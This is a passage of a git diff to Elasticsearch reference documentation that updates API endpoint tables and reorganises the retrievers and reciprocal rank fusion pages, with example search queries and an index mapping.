policy](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-slm-execute-lifecycle) | Triggers a snapshot lifecycle policy manually. | +| [Execute snapshot retention](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-slm-execute-retention) | Manually apply the retention policy to force immediate removal of snapshots that are expired according to the snapshot lifecycle policy retention rules. | +| [Get snapshot lifecycle stats](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-slm-get-stats) | Returns statistics about snapshot lifecycle executions. | +| [Get snapshot lifecycle status](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-slm-get-status) | Returns the status of the snapshot lifecycle management feature. | +| [Start snapshot lifecycle management](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-slm-start) | Starts the snapshot lifecycle management feature. | +| [Stop snapshot lifecycle management](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-slm-stop) | Stops the snapshot lifecycle management feature. | + +### [SQL](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-sql) + +The SQL APIs enable you to run SQL queries on Elasticsearch indices and data streams. + +| API | Description | +| --- | ----------- | +| [Clear SQL cursor](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-sql-clear-cursor) | Clears the server-side cursor for an SQL search. | +| [Delete async SQL search](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-sql-delete-async) | Deletes an async SQL search. | +| [Get async SQL search results](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-sql-get-async) | Retrieves results of an async SQL query. | +| [Get async SQL search status](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-sql-get-async-status) | Gets the current status of an async SQL search or a stored synchronous SQL search. | +| [SQL query](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-sql-query) | Executes an SQL query. | +| [Translate SQL](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-sql-translate) | Translates SQL into Elasticsearch DSL. | + +### [Synonyms](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-synonyms) + +The synonyms management APIs provide a convenient way to define and manage synonyms in an internal system index. Related synonyms can be grouped in a "synonyms set". + +| API | Description | +| --- | ----------- | +| [Get synonym set](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-synonyms-get-synonym) | Retrieves a synonym set by ID. | +| [Create of update synonym set](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-synonyms-put-synonym) | Creates or updates a synonym set. | +| [Delete synonym set](https://www.elastic.co/docs/api/doc/elasticsearch/endpoint/synonyms.delete_synonym) | Deletes a synonym set. | +| [Get synonym rule](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-synonyms-get-synonym-rule) | | +| [Get synonym sets](https://www.elastic.co/docs/api/doc/elasticsearch/endpoint/synonyms.get_synonyms) | Lists all synonym sets. | + +### [Task management](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-tasks) + +The task management APIs enable you to retrieve information about tasks or cancel tasks running in a cluster. + +| API | Description | +| --- | ----------- | +| [Cancel a task](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-tasks-cancel) | Cancels a running task. | +| [Get task information](https://www.elastic.co/docs/api/doc/elasticsearch/v9/operation/operation-tasks-get) | | +| [Get all tasks](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-tasks-list) | Retrieves information about running tasks. | + +### [Text structure](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-text_structure) + +The text structure APIs enable you to find the structure of a text field in an {{es}} index. + +| API | Description | +| --- | ----------- | +| [Find the structure of a text field](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-text-structure-find-field-structure) | | +| [Find the structure of a text message](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-text-structure-find-message-structure) | | +| [Find the structure of a text file](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-text-structure-find-structure) | Analyzes a text file and returns its structure. | +| [Test a Grok pattern](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-text-structure-test-grok-pattern) | | + +### [Transform](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-transform) + +The transform APIs enable you to create and manage transforms. + +| API | Description | +| --- | ----------- | +| [Get transforms](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-transform-get-transform) | Retrieves configuration for one or more transforms. | +| [Create a transform](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-transform-put-transform) | Creates or updates a transform job. | +| [Get transform stats](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-transform-get-transform-stats) | Get usage information for transforms. | +| [Preview transform](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-transform-preview-transform) | Previews the results of a transform job. | +| [Reset a transform](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-transform-reset-transform) | Previews the results of a transform job. | +| [Delete transform](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-transform-delete-transform) | Deletes a transform job. | +| [Schedule a transform](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-transform-schedule-now-transform) | Previews the results of a transform job. | +| [Start transform](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-transform-start-transform) | Starts a transform job. | +| [Stop transform](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-transform-stop-transform) | Stops a running transform job. | +| [Update transform](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-transform-update-transform) | Updates certain properties of a transform. | +| [Upgrade all transforms](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-transform-upgrade-transforms) | Updates certain properties of a transform. | + +### [Usage](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-xpack) + +The usage API provides usage information about the installed X-Pack features. + +| API | Description | +| --- | ----------- | +| [Get information](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-xpack-info) | Gets information about build details, license status, and a list of features currently available under the installed license. | +| [Get usage information](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-xpack-usage) | Get information about the features that are currently enabled and available under the current license. | + + +### [Watcher](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-watcher) + +You can use Watcher to watch for changes or anomalies in your data and perform the necessary actions in response. + +| API | Description | +| --- | ----------- | +| [Acknowledge a watch](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-watcher-ack-watch) | Acknowledges a watch action. | +| [Activate a watch](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-watcher-activate-watch) | Activates a watch. | +| [Deactivates a watch](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-watcher-deactivate-watch) | Deactivates a watch. | +| [Get a watch](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-watcher-get-watch) | Retrieves a watch by ID. | +| [Create or update a watch](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-watcher-put-watch) | Creates or updates a watch. | +| [Delete a watch](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-watcher-delete-watch) | Deletes a watch. | +| [Run a watch](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-watcher-execute-watch) | Executes a watch manually. | +| [Get Watcher index settings](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-watcher-get-settings) | Get settings for the Watcher internal index | +| [Update Watcher index settings](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-watcher-update-settings) | Update settings for the Watcher internal index | +| [Query watches](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-watcher-query-watches) | Get all registered watches in a paginated manner and optionally filter watches by a query. | +| [Start the watch service](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-watcher-start) | Starts the Watcher service. | +| [Get Watcher statistics](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-watcher-stats) | Returns statistics about the Watcher service. | +| [Stop the watch service](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-watcher-stop) | Stops the Watcher service. | diff --git a/docs/reference/elasticsearch/rest-apis/reciprocal-rank-fusion.md b/docs/reference/elasticsearch/rest-apis/reciprocal-rank-fusion.md index dc7f02a119397..c640929584bb7 100644 --- a/docs/reference/elasticsearch/rest-apis/reciprocal-rank-fusion.md +++ b/docs/reference/elasticsearch/rest-apis/reciprocal-rank-fusion.md @@ -34,7 +34,7 @@ For the most up-to-date API details, refer to [Search APIs](https://www.elastic. :::: -You can use RRF as part of a [search](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search) to combine and rank documents using separate sets of top documents (result sets) from a combination of [child retrievers](/reference/elasticsearch/rest-apis/retrievers.md) using an [RRF retriever](/reference/elasticsearch/rest-apis/retrievers.md#rrf-retriever). A minimum of **two** child retrievers is required for ranking. +You can use RRF as part of a [search](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search) to combine and rank documents using separate sets of top documents (result sets) from a combination of [child retrievers](/reference/elasticsearch/rest-apis/retrievers.md) using an [RRF retriever](/reference/elasticsearch/rest-apis/retrievers/rrf-retriever.md). A minimum of **two** child retrievers is required for ranking. An RRF retriever is an optional object defined as part of a search request’s [retriever parameter](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search#request-body-retriever). The RRF retriever object contains the following parameters: @@ -758,7 +758,7 @@ Highlighting on vector fields, using either the `knn` retriever or a `knn` query :::: -A more specific example of highlighting in RRF can also be found in the [retrievers examples](docs-content://solutions/search/retrievers-examples.md#retrievers-examples-highlighting-retriever-results) page. +A more specific example of highlighting in RRF can also be found in the [retrievers examples](retrievers/retrievers-examples.md#retrievers-examples-highlighting-retriever-results) page. ## Inner hits in RRF [_inner_hits_in_rrf] diff --git a/docs/reference/elasticsearch/rest-apis/retrievers.md b/docs/reference/elasticsearch/rest-apis/retrievers.md index cbcae05e42681..a076d34941c09 100644 --- a/docs/reference/elasticsearch/rest-apis/retrievers.md +++ b/docs/reference/elasticsearch/rest-apis/retrievers.md @@ -3,6 +3,7 @@ mapped_pages: - https://www.elastic.co/guide/en/elasticsearch/reference/current/retriever.html applies_to: stack: all + serverless: ga --- # Retrievers [retriever] @@ -10,992 +11,232 @@ applies_to: A retriever is a specification to describe top documents returned from a search. A retriever replaces other elements of the [search API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search) that also return top documents such as [`query`](/reference/query-languages/querydsl.md) and [`knn`](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search#search-api-knn). A retriever may have child retrievers where a retriever with two or more children is considered a compound retriever. This allows for complex behavior to be depicted in a tree-like structure, called the retriever tree, which clarifies the order of operations that occur during a search. ::::{tip} -Refer to [*Retrievers*](docs-content://solutions/search/retrievers-overview.md) for a high level overview of the retrievers abstraction. Refer to [Retrievers examples](docs-content://solutions/search/retrievers-examples.md) for additional examples. +Refer to [*Retrievers*](docs-content://solutions/search/retrievers-overview.md) for a high level overview of the retrievers abstraction. Refer to [Retrievers examples](retrievers/retrievers-examples.md) for additional examples. :::: - -::::{admonition} New API reference -For the most up-to-date API details, refer to [Search APIs](https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-search). - -:::: - - The following retrievers are available: -`standard` -: A [retriever](#standard-retriever) that replaces the functionality of a traditional [query](/reference/query-languages/querydsl.md). - `knn` -: A [retriever](#knn-retriever) that replaces the functionality of a [knn search](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search#search-api-knn). +: The [knn](retrievers/knn-retriever.md) retriever replaces the functionality of a [knn search](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search#search-api-knn). `linear` -: A [retriever](#linear-retriever) that linearly combines the scores of other retrievers for the top documents. +: The [linear](retrievers/linear-retriever.md) retriever linearly combines the scores of other retrievers for the top documents. + +`pinned` {applies_to}`stack: GA 9.1` +: The [pinned](retrievers/pinned-retriever.md) retriever always places specified documents at the top of the results, with the remaining hits provided by a secondary retriever. `rescorer` -: A [retriever](#rescorer-retriever) that replaces the functionality of the [query rescorer](/reference/elasticsearch/rest-apis/filter-search-results.md#rescore). +: The [rescorer](retrievers/rescorer-retriever.md) retriever replaces the functionality of the [query rescorer](/reference/elasticsearch/rest-apis/filter-search-results.md#rescore). `rrf` -: A [retriever](#rrf-retriever) that produces top documents from [reciprocal rank fusion (RRF)](/reference/elasticsearch/rest-apis/reciprocal-rank-fusion.md). - -`text_similarity_reranker` -: A [retriever](#text-similarity-reranker-retriever) that enhances search results by re-ranking documents based on semantic similarity to a specified inference text, using a machine learning model. - -`pinned` {applies_to}`stack: GA 9.1` -: A [retriever](#pinned-retriever) that always places specified documents at the top of the results, with the remaining hits provided by a secondary retriever. +: The [rrf](retrievers/rrf-retriever.md) retriever produces top documents from [reciprocal rank fusion (RRF)](/reference/elasticsearch/rest-apis/reciprocal-rank-fusion.md). `rule` -: A [retriever](#rule-retriever) that applies contextual [Searching with query rules](/reference/elasticsearch/rest-apis/searching-with-query-rules.md#query-rules) to pin or exclude documents for specific queries. - -## Standard Retriever [standard-retriever] - -A standard retriever returns top documents from a traditional [query](/reference/query-languages/querydsl.md). - - -#### Parameters: [standard-retriever-parameters] - -`query` -: (Optional, [query object](/reference/query-languages/querydsl.md)) - - Defines a query to retrieve a set of top documents. - - -`filter` -: (Optional, [query object or list of query objects](/reference/query-languages/querydsl.md)) - - Applies a [boolean query filter](/reference/query-languages/query-dsl/query-dsl-bool-query.md) to this retriever, where all documents must match this query but do not contribute to the score. +: The [rule](retrievers/rule-retriever.md) retriever applies contextual [Searching with query rules](/reference/elasticsearch/rest-apis/searching-with-query-rules.md#query-rules) to pin or exclude documents for specific queries. +`standard` +: The [standard](retrievers/standard-retriever.md) retriever replaces the functionality of a traditional [query](/reference/query-languages/querydsl.md). -`search_after` -: (Optional, [search after object](/reference/elasticsearch/rest-apis/paginate-search-results.md#search-after)) - - Defines a search after object parameter used for pagination. - - -`terminate_after` -: (Optional, integer) Maximum number of documents to collect for each shard. If a query reaches this limit, {{es}} terminates the query early. {{es}} collects documents before sorting. - - ::::{important} - Use with caution. {{es}} applies this parameter to each shard handling the request. When possible, let {{es}} perform early termination automatically. Avoid specifying this parameter for requests that target data streams with backing indices across multiple data tiers. - :::: - +`text_similarity_reranker` +: The [text_similarity_reranker](retrievers/text-similarity-reranker-retriever.md) retriever enhances search results by re-ranking documents based on semantic similarity to a specified inference text, using a machine learning model. -`sort` -: (Optional, [sort object](/reference/elasticsearch/rest-apis/sort-search-results.md)) A sort object that specifies the order of matching documents. +## Common usage guidelines [retriever-common-parameters] -`min_score` -: (Optional, `float`) +### Using `from` and `size` with a retriever tree [retriever-size-pagination] - Minimum [`_score`](/reference/query-languages/query-dsl/query-filter-context.md#relevance-scores) for matching documents. Documents with a lower `_score` are not included in the top documents. +The [`from`](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search#search-from-param) and [`size`](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search#search-size-param) parameters are provided globally as part of the general [search API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search). They are applied to all retrievers in a retriever tree, unless a specific retriever overrides the `size` parameter using a different parameter such as `rank_window_size`. Though, the final search hits are always limited to `size`. -`collapse` -: (Optional, [collapse object](/reference/elasticsearch/rest-apis/collapse-search-results.md)) +### Using aggregations with a retriever tree [retriever-aggregations] - Collapses the top documents by a specified key into a single top document per key. +[Aggregations](/reference/aggregations/index.md) are globally specified as part of a search request. The query used for an aggregation is the combination of all leaf retrievers as `should` clauses in a [boolean query](/reference/query-languages/query-dsl/query-dsl-bool-query.md). -### Restrictions [_restrictions] +### Restrictions on search parameters when specifying a retriever [retriever-restrictions] -When a retriever tree contains a compound retriever (a retriever with two or more child retrievers) the [search after](/reference/elasticsearch/rest-apis/paginate-search-results.md#search-after) parameter is not supported. +When a retriever is specified as part of a search, the following elements are not allowed at the top-level: +* [`query`](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search#request-body-search-query) +* [`knn`](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search#search-api-knn) +* [`search_after`](/reference/elasticsearch/rest-apis/paginate-search-results.md#search-after) +* [`terminate_after`](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search#request-body-search-terminate-after) +* [`sort`](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search#search-sort-param) +* [`rescore`](/reference/elasticsearch/rest-apis/filter-search-results.md#rescore) use a [rescorer retriever](retrievers/rescorer-retriever.md) instead -### Example [standard-retriever-example] -```console -GET /restaurants/_search -{ - "retriever": { <1> - "standard": { <2> - "query": { <3> - "bool": { <4> - "should": [ <5> - { - "match": { <6> - "region": "Austria" - } - } - ], - "filter": [ <7> - { - "term": { <8> - "year": "2019" <9> - } - } - ] - } - } - } - } -} +## Multi-field query format [multi-field-query-format] +```yaml {applies_to} +stack: ga 9.1 ``` -1. Opens the `retriever` object. -2. The `standard` retriever is used for defining traditional {{es}} queries. -3. The entry point for defining the search query. -4. The `bool` object allows for combining multiple query clauses logically. -5. The `should` array indicates conditions under which a document will match. Documents matching these conditions will have increased relevancy scores. -6. The `match` object finds documents where the `region` field contains the word "Austria." -7. The `filter` array provides filtering conditions that must be met but do not contribute to the relevancy score. -8. The `term` object is used for exact matches, in this case, filtering documents by the `year` field. -9. The exact value to match in the `year` field. - - - - -## kNN Retriever [knn-retriever] - -A kNN retriever returns top documents from a [k-nearest neighbor search (kNN)](docs-content://solutions/search/vector/knn.md). - - -#### Parameters [knn-retriever-parameters] - -`field` -: (Required, string) - - The name of the vector field to search against. Must be a [`dense_vector` field with indexing enabled](/reference/elasticsearch/mapping-reference/dense-vector.md#index-vectors-knn-search). - - -`query_vector` -: (Required if `query_vector_builder` is not defined, array of `float`) - - Query vector. Must have the same number of dimensions as the vector field you are searching against. Must be either an array of floats or a hex-encoded byte vector. - - -`query_vector_builder` -: (Required if `query_vector` is not defined, query vector builder object) - - Defines a [model](docs-content://solutions/search/vector/knn.md#knn-semantic-search) to build a query vector. +The [`linear`](retrievers/linear-retriever.md) and [`rrf`](retrievers/rrf-retriever.md) retrievers support a multi-field query format that provides a simplified way to define searches across multiple fields without explicitly specifying inner retrievers. +This format automatically generates appropriate inner retrievers based on the field types and query parameters. +This is a great way to search an index, knowing little to nothing about its schema, while also handling normalization across lexical and semantic matches. +### Field grouping [multi-field-field-grouping] -`k` -: (Required, integer) +The multi-field query format groups queried fields into two categories: - Number of nearest neighbors to return as top hits. This value must be fewer than or equal to `num_candidates`. +- **Lexical fields**: fields that support term queries, such as `keyword` and `text` fields. +- **Semantic fields**: [`semantic_text` fields](/reference/elasticsearch/mapping-reference/semantic-text.md). +Each field group is queried separately and the scores/ranks are normalized such that each contributes 50% to the final score/rank. +This balances the importance of lexical and semantic fields. +Most indices contain more lexical than semantic fields, and without this grouping the results would often bias towards lexical field matches. -`num_candidates` -: (Required, integer) - - The number of nearest neighbor candidates to consider per shard. Needs to be greater than `k`, or `size` if `k` is omitted, and cannot exceed 10,000. {{es}} collects `num_candidates` results from each shard, then merges them to find the top `k` results. Increasing `num_candidates` tends to improve the accuracy of the final `k` results. Defaults to `Math.min(1.5 * k, 10_000)`. - - -`filter` -: (Optional, [query object or list of query objects](/reference/query-languages/querydsl.md)) - - Query to filter the documents that can match. The kNN search will return the top `k` documents that also match this filter. The value can be a single query or a list of queries. If `filter` is not provided, all documents are allowed to match. - - -`similarity` -: (Optional, float) - - The minimum similarity required for a document to be considered a match. The similarity value calculated relates to the raw [`similarity`](/reference/elasticsearch/mapping-reference/dense-vector.md#dense-vector-similarity) used. Not the document score. The matched documents are then scored according to [`similarity`](/reference/elasticsearch/mapping-reference/dense-vector.md#dense-vector-similarity) and the provided `boost` is applied. - - The `similarity` parameter is the direct vector similarity calculation. - - * `l2_norm`: also known as Euclidean, will include documents where the vector is within the `dims` dimensional hypersphere with radius `similarity` with origin at `query_vector`. - * `cosine`, `dot_product`, and `max_inner_product`: Only return vectors where the cosine similarity or dot-product are at least the provided `similarity`. - - Read more here: [knn similarity search](docs-content://solutions/search/vector/knn.md#knn-similarity-search) - - -`rescore_vector` -: (Optional, object) Apply oversampling and rescoring to quantized vectors. - -::::{note} -Rescoring only makes sense for quantized vectors; when [quantization](/reference/elasticsearch/mapping-reference/dense-vector.md#dense-vector-quantization) is not used, the original vectors are used for scoring. Rescore option will be ignored for non-quantized `dense_vector` fields. +::::{warning} +In the `linear` retriever, this grouping relies on using a normalizer other than `none` (i.e., `minmax` or `l2_norm`). +If you use the `none` normalizer, the scores across field groups will not be normalized and the results may be biased towards lexical field matches. :::: +### Linear retriever field boosting [multi-field-field-boosting] -`oversample` -: (Required, float) - - Applies the specified oversample factor to `k` on the approximate kNN search. The approximate kNN search will: - - * Retrieve `num_candidates` candidates per shard. - * From these candidates, the top `k * oversample` candidates per shard will be rescored using the original vectors. - * The top `k` rescored candidates will be returned. - - -See [oversampling and rescoring quantized vectors](docs-content://solutions/search/vector/knn.md#dense-vector-knn-search-rescoring) for details. - - -### Restrictions [_restrictions_2] - -The parameters `query_vector` and `query_vector_builder` cannot be used together. - - -### Example [knn-retriever-example] +When using the `linear` retriever, fields can be boosted using the `^` notation: ```console -GET /restaurants/_search +GET books/_search { "retriever": { - "knn": { <1> - "field": "vector", <2> - "query_vector": [10, 22, 77], <3> - "k": 10, <4> - "num_candidates": 10 <5> - } - } -} -``` - -1. Configuration for k-nearest neighbor (knn) search, which is based on vector similarity. -2. Specifies the field name that contains the vectors. -3. The query vector against which document vectors are compared in the `knn` search. -4. The number of nearest neighbors to return as top hits. This value must be fewer than or equal to `num_candidates`. -5. The size of the initial candidate set from which the final `k` nearest neighbors are selected. - - - - -## Linear Retriever [linear-retriever] - -A retriever that normalizes and linearly combines the scores of other retrievers. - - -#### Parameters [linear-retriever-parameters] - -`retrievers` -: (Required, array of objects) - - A list of the sub-retrievers' configuration, that we will take into account and whose result sets we will merge through a weighted sum. Each configuration can have a different weight and normalization depending on the specified retriever. - - -Each entry specifies the following parameters: - -`retriever` -: (Required, a `retriever` object) - - Specifies the retriever for which we will compute the top documents for. The retriever will produce `rank_window_size` results, which will later be merged based on the specified `weight` and `normalizer`. - -`weight` -: (Optional, float) - - The weight that each score of this retriever’s top docs will be multiplied with. Must be greater or equal to 0. Defaults to 1.0. - -`normalizer` -: (Optional, String) - - - Specifies how we will normalize the retriever’s scores, before applying the specified `weight`. Available values are: `minmax`, `l2_norm`, and `none`. Defaults to `none`. - - * `none` - * `minmax` : A `MinMaxScoreNormalizer` that normalizes scores based on the following formula - - ``` - score = (score - min) / (max - min) - ``` - - * `l2_norm` : An `L2ScoreNormalizer` that normalizes scores using the L2 norm of the score values. - -See also [this hybrid search example](docs-content://solutions/search/retrievers-examples.md#retrievers-examples-linear-retriever) using a linear retriever on how to independently configure and apply normalizers to retrievers. - -`rank_window_size` -: (Optional, integer) - - This value determines the size of the individual result sets per query. A higher value will improve result relevance at the cost of performance. The final ranked result set is pruned down to the search request’s [size](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search#search-size-param). `rank_window_size` must be greater than or equal to `size` and greater than or equal to `1`. Defaults to the `size` parameter. - - -`filter` -: (Optional, [query object or list of query objects](/reference/query-languages/querydsl.md)) - - Applies the specified [boolean query filter](/reference/query-languages/query-dsl/query-dsl-bool-query.md) to all of the specified sub-retrievers, according to each retriever’s specifications. - - - -## RRF Retriever [rrf-retriever] - -An [RRF](/reference/elasticsearch/rest-apis/reciprocal-rank-fusion.md) retriever returns top documents based on the RRF formula, equally weighting two or more child retrievers. Reciprocal rank fusion (RRF) is a method for combining multiple result sets with different relevance indicators into a single result set. - - -#### Parameters [rrf-retriever-parameters] - -`retrievers` -: (Required, array of retriever objects) - - A list of child retrievers to specify which sets of returned top documents will have the RRF formula applied to them. Each child retriever carries an equal weight as part of the RRF formula. Two or more child retrievers are required. - - -`rank_constant` -: (Optional, integer) - - This value determines how much influence documents in individual result sets per query have over the final ranked result set. A higher value indicates that lower ranked documents have more influence. This value must be greater than or equal to `1`. Defaults to `60`. - - -`rank_window_size` -: (Optional, integer) - - This value determines the size of the individual result sets per query. A higher value will improve result relevance at the cost of performance. The final ranked result set is pruned down to the search request’s [size](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search#search-size-param). `rank_window_size` must be greater than or equal to `size` and greater than or equal to `1`. Defaults to the `size` parameter. - - -`filter` -: (Optional, [query object or list of query objects](/reference/query-languages/querydsl.md)) - - Applies the specified [boolean query filter](/reference/query-languages/query-dsl/query-dsl-bool-query.md) to all of the specified sub-retrievers, according to each retriever’s specifications. - - - -### Example: Hybrid search [rrf-retriever-example-hybrid] - -A simple hybrid search example (lexical search + dense vector search) combining a `standard` retriever with a `knn` retriever using RRF: - -```console -GET /restaurants/_search -{ - "retriever": { - "rrf": { <1> - "retrievers": [ <2> - { - "standard": { <3> - "query": { - "multi_match": { - "query": "Austria", - "fields": [ - "city", - "region" - ] - } - } - } - }, - { - "knn": { <4> - "field": "vector", - "query_vector": [10, 22, 77], - "k": 10, - "num_candidates": 10 - } - } + "linear": { + "query": "elasticsearch", + "fields": [ + "title^3", <1> + "description^2", <2> + "title_semantic", <3> + "description_semantic^2" ], - "rank_constant": 1, <5> - "rank_window_size": 50 <6> + "normalizer": "minmax" } } } ``` -1. Defines a retriever tree with an RRF retriever. -2. The sub-retriever array. -3. The first sub-retriever is a `standard` retriever. -4. The second sub-retriever is a `knn` retriever. -5. The rank constant for the RRF retriever. -6. The rank window size for the RRF retriever. - +1. 3x weight +2. 2x weight +3. 1x weight (default) +Due to how the [field group scores](#multi-field-field-grouping) are normalized, per-field boosts have no effect on the range of the final score. +Instead, they affect the importance of the field's score within its group. -### Example: Hybrid search with sparse vectors [rrf-retriever-example-hybrid-sparse] - -A more complex hybrid search example (lexical search + ELSER sparse vector search + dense vector search) using RRF: +For example, if the schema looks like: ```console -GET movies/_search +PUT /books { - "retriever": { - "rrf": { - "retrievers": [ - { - "standard": { - "query": { - "sparse_vector": { - "field": "plot_embedding", - "inference_id": "my-elser-model", - "query": "films that explore psychological depths" - } - } - } - }, - { - "standard": { - "query": { - "multi_match": { - "query": "crime", - "fields": [ - "plot", - "title" - ] - } - } - } - }, - { - "knn": { - "field": "vector", - "query_vector": [10, 22, 77], - "k": 10, - "num_candidates": 10 - } - } - ] - } - } -} -``` - - -## Rescorer Retriever [rescorer-retriever] - -The `rescorer` retriever re-scores only the results produced by its child retriever. For the `standard` and `knn` retrievers, the `window_size` parameter specifies the number of documents examined per shard. - -For compound retrievers like `rrf`, the `window_size` parameter defines the total number of documents examined globally. - -When using the `rescorer`, an error is returned if the following conditions are not met: - -* The minimum configured rescore’s `window_size` is: - - * Greater than or equal to the `size` of the parent retriever for nested `rescorer` setups. - * Greater than or equal to the `size` of the search request when used as the primary retriever in the tree. - -* And the maximum rescore’s `window_size` is: - - * Smaller than or equal to the `size` or `rank_window_size` of the child retriever. - - - -#### Parameters [rescorer-retriever-parameters] - -`rescore` -: (Required. [A rescorer definition or an array of rescorer definitions](/reference/elasticsearch/rest-apis/filter-search-results.md#rescore)) - - Defines the [rescorers](/reference/elasticsearch/rest-apis/filter-search-results.md#rescore) applied sequentially to the top documents returned by the child retriever. - - -`retriever` -: (Required. `retriever`) - - Specifies the child retriever responsible for generating the initial set of top documents to be re-ranked. - - -`filter` -: (Optional. [query object or list of query objects](/reference/query-languages/querydsl.md)) - - Applies a [boolean query filter](/reference/query-languages/query-dsl/query-dsl-bool-query.md) to the retriever, ensuring that all documents match the filter criteria without affecting their scores. - - - -### Example [rescorer-retriever-example] - -The `rescorer` retriever can be placed at any level within the retriever tree. The following example demonstrates a `rescorer` applied to the results produced by an `rrf` retriever: - -```console -GET movies/_search -{ - "size": 10, <1> - "retriever": { - "rescorer": { <2> - "rescore": { - "window_size": 50, <3> - "query": { <4> - "rescore_query": { - "script_score": { - "query": { - "match_all": {} - }, - "script": { - "source": "cosineSimilarity(params.queryVector, 'product-vector_final_stage') + 1.0", - "params": { - "queryVector": [-0.5, 90.0, -10, 14.8, -156.0] - } - } - } - } - } + "mappings": { + "properties": { + "title": { + "type": "text", + "copy_to": "title_semantic" + }, + "description": { + "type": "text", + "copy_to": "description_semantic" }, - "retriever": { <5> - "rrf": { - "rank_window_size": 100, <6> - "retrievers": [ - { - "standard": { - "query": { - "sparse_vector": { - "field": "plot_embedding", - "inference_id": "my-elser-model", - "query": "films that explore psychological depths" - } - } - } - }, - { - "standard": { - "query": { - "multi_match": { - "query": "crime", - "fields": [ - "plot", - "title" - ] - } - } - } - }, - { - "knn": { - "field": "vector", - "query_vector": [10, 22, 77], - "k": 10, - "num_candidates": 10 - } - } - ] - } + "title_semantic": { + "type": "semantic_text" + }, + "description_semantic": { + "type": "semantic_text" } } } } ``` -1. Specifies the number of top documents to return in the final response. -2. A `rescorer` retriever applied as the final step. -3. Defines the number of documents to rescore from the child retriever. -4. The definition of the `query` rescorer. -5. Specifies the child retriever definition. -6. Defines the number of documents returned by the `rrf` retriever, which limits the available documents to - - - -## Text Similarity Re-ranker Retriever [text-similarity-reranker-retriever] - -The `text_similarity_reranker` retriever uses an NLP model to improve search results by reordering the top-k documents based on their semantic similarity to the query. - -::::{tip} -Refer to [*Semantic re-ranking*](docs-content://solutions/search/ranking/semantic-reranking.md) for a high level overview of semantic re-ranking. - -:::: - - -### Prerequisites [_prerequisites_15] - -To use `text_similarity_reranker`, you can rely on the preconfigured `.rerank-v1-elasticsearch` inference endpoint, which uses the [Elastic Rerank model](docs-content://explore-analyze/machine-learning/nlp/ml-nlp-rerank.md) and serves as the default if no `inference_id` is provided. This model is optimized for reranking based on text similarity. If you'd like to use a different model, you can set up a custom inference endpoint for the `rerank` task using the [Create {{infer}} API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put). The endpoint should be configured with a machine learning model capable of computing text similarity. Refer to [the Elastic NLP model 